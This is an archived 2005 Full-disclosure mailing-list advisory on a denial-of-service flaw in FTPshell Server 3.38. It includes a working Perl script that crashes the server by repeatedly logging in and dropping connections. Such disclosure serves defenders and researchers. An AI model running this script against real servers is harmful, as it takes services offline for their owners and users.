Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Full-disclosure] Denial of service vulnerability in FTPshell Server Ver

from [Reed Arvin] Network Security [Permanent Link]
Subject: [Full-disclosure] Denial of service vulnerability in FTPshell Server Version 3.38
Date: Mon, 25 Jul 2005 19:50:41 -0700 
Summary:
Denial of service vulnerability in FTPshell Server Version 3.38
(http://www.ftpshell.com/)

Details:
Logging into the FTP server successfully and then closing the
connection (without using the QUIT command) 39 times will cause the
ftpshelld.exe process will die.

Vulnerable Versions:
FTPshell Server Version 3.38

Patches/Workarounds:
The vendor was notified of the issue. A patch will be release shorly.
The patch will be made available via the vendor's web site
(http://www.ftpshell.com/).

Exploits:
Run the following PERL script against the server. The corresponding
process will die.

#===== Start FTPShell_FTPDOS.pl =====
#
# Usage: FTPShell_FTPDOS.pl <ip> <user> <pass>
#        FTPShell_FTPDOS.pl 127.0.0.1 hello moto
#
# FTPshell Server Version 3.38
#
# Download:
# http://www.ftpshell.com/
#
################################################

use IO::Socket;
use Win32;
use strict;

my($i)      = "";
my($socket) = "";

for ($i = 1; $i <= 40; $i++)
{
        if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                            PeerPort => "21",
                                            Proto    => "TCP"))
        {
                print "Login \#$i\n";

                Win32::Sleep(300);

                print $socket "USER $ARGV[1]\r\n";

                Win32::Sleep(100);

                print $socket "PASS $ARGV[2]\r\n";

                Win32::Sleep(100);

                print $socket "PORT 127,0,0,1,18,12\r\n";

                Win32::Sleep(100);

                close($socket);
        }
        else
        {
                print "Cannot connect to $ARGV[0]:21\n";
        }
}
#===== Start FTPShell_FTPDOS.pl =====

Discovered by Reed Arvin reedarvin[at]gmail[dot]com
(http://reedarvin.thearvins.com/)

Vulnerability discovered using PeachFuzz
(http://reedarvin.thearvins.com/tools.html)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [Full-disclosure] Denial of service vulnerability in FTPshell Server Version 3.38, Reed Arvin <=
Previous by Date:  [Full-disclosure] [USN-149-2] Fixed Firefox packages for USN-149-1, Martin Pitt
Next by Date:  [Full-disclosure] SPIDynamics WebInspect Cross-Application Scripting (XAS), 3APA3A
Previous by Thread:  [Full-disclosure] [USN-149-2] Fixed Firefox packages for USN-149-1, Martin Pitt
Next by Thread:  [Full-disclosure] SPIDynamics WebInspect Cross-Application Scripting (XAS), 3APA3A
Indexes:  [Date] [Thread] [Top] [All Lists]